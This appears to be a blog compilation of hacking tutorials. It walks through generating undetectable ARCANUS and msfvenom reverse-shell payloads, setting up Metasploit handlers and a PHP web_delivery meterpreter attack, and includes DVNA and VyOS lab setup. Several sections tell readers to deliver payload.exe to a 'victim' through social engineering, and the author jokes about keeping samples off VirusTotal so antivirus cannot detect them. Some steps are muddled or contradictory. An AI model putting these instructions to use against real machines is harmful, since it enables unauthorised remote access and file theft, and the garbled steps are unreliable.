Hack Remote Windows 10 PC using ARCANUS (Bypass All Antivirus)

ARCANUS is a customized payload generator/handler for penetration testing only

WHY USE ARCANUS ?

·         İn pen.test world Metasploit is the mainstream for this job, but ARCANUS has few advantages.

·         ARCANUS generates a unique payload for windows and linux systems that can't be detected with any antivirus programs. (Don't give any samples to Virus Total or similar web sites to keep it that way ;D )

·         It has extra modules for exploitation. Ordinary reverse shell payloads offers only remote access to command prompts but ARCANUS has few special commands like " £persistence, £download, £upload, £meterpreter..."

·         It is silent and continuous. Metasploit payloads attempts to connect remote host just for ones but when you execute ARCANUS payloads they makes connection attemps every 5 second silently in background.

·         It is flexible. If you want to use it with Metasploit it has a meterpreter module for executeing meterpreter shellcodes on remote machine.

·         Platform independent ! ARCANUS works both on windows and linux.

Open your kali Linux terminal and type the following command

https://github.com/EgeBalci/ARCANUS.git

Open terminal and type ./ARCANUS and press enter to continue

Now it will ask you for your choice press 2 now a pop up will open click on enter

Now Enter IP addresses of your kali Linux pc. And press enter. In next step it will ask for port no. Enter the port no.  Such as 4444 and press enter

Now it will save a file with name payload.exe now send your exe files to victim using any social engineering technique.

Go to https://www.virustotal.com/en

Click the “Choose File” button. Navigate to and double-click the payload.exe. Appears in the “Choose File” box, as shown below:

Now when the victim opens payload.exe you can access of windows command prompt. Now run SystemInfo in prompt, will tell you all you need to know about your computer system

When we need to retrieve a file from the target we use the download command

£download “Filename” /root/Your Path

For More Command visit here

Exploit Windows 10 PC using msfven.sh Script

Open your kali Linux terminal and type the following command

https://github.com/wayneaswilliams/msfvenom_custom_encoding.git

Now type following command to create payload

./msfven.sh

Now Enter IP addresses of your kali Linux pc. And press enter. In next step it will ask for port no. Enter the port no.  Such as 4445 and press enter

In next step use payloads e.g.windows/meterpreter/reverse_tcp and press enter

Now it will show a file with name tcp_445.exe now send your exe files to victim using any social engineering technique.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.140

exploit

Now send your exe files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.

Web Hacking Lab Setup using DVNA in Kali Linux

Damn Vulnerable Node Application (DVNA) is a Node.js web application that is damn vulnerable. Its intended purpose is to teach secure coding concepts to web developers who use Node, and to explore web application vulnerabilities in a controlled class environment or to serve as a cyber range for capture the flag events. It's loaded with common web vulnerabilities and various levels of complexity.

Open your kali Linux terminal and type the following command

sudo apt-get install git

Now type

wget -qO- https://raw.github.com/creationix/nvm/master/install.sh | sh

source ~/.bashrc







In next type

nvm install 5.3.0

nvm use 5.3.0

git clone https://github.com/quantumfoam/DVNA.git

cd DVNA/

npm set progress=false

In next step type







Now type

node dvna.js

Navigate to http://localhost:3000/

How to Setup VyOS (Virtual Router Pentest Lab)

VyOS is a Linux-based network operating system that provides software-based network routing, firewall, and VPN functionality.  Its configuration syntax and command-line interface are loosely derived from Juniper JUNOS as modeled by the XORP project.

First Download Vyos iso image from here

Open VMWARE tool, create a new virtual machine. Select Installer disc image file and select OS image of vyos and click on next.

Enter your virtual machine name and location. Click next.

Set Ram upto 1 GB for vyos and click to network adapter

Next we are choosing our first network adapter. Connect it to the Bridge Adapter and click on close.

Then click on finish.

Now installation process will start automatically. It takes a few seconds for the VM to boot and VyOS to load.

After boot screen hit enter and login to vyos using following credentials:

Username : vyos

Password : vyos

Installation of Vyos on local disk. In order to do that simply execute command: install image and press enter

Now type yes and press enter in next option Select auto partition press enter

In next option type yes to continue press enter

After the installation is complete Issue the reboot command Again type: yes press enter

Login again to vyos and we will start with setting

Now we will check network interfaces using show interfaces command

Now Enter configuration mode by typing “conf” and have a look at the current interfaces:

After you made some changes, you need to enter the “commit” and “save” commands.

Now we will setup network interfaces:

set interfaces ethernet eth0 address dhcp

Now again you need to enter the “commit” and “save” commands. Now we will check network interfaces using run show interfaces command.

Now before we are able to connect to our router with SSH, we will enable SSH In order to do it execute following commands:

 set service ssh Commit and save.

Now before we are able to connect to our router with TELNET, we need to enable that. To do so, issue the following commands

set service telnet Commit and save

To check all enable service type the following command

Show service

Hack Remote Linux PC using PHP File

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

Exploit Targets

Linux

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.22 (IP of Local Host)

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit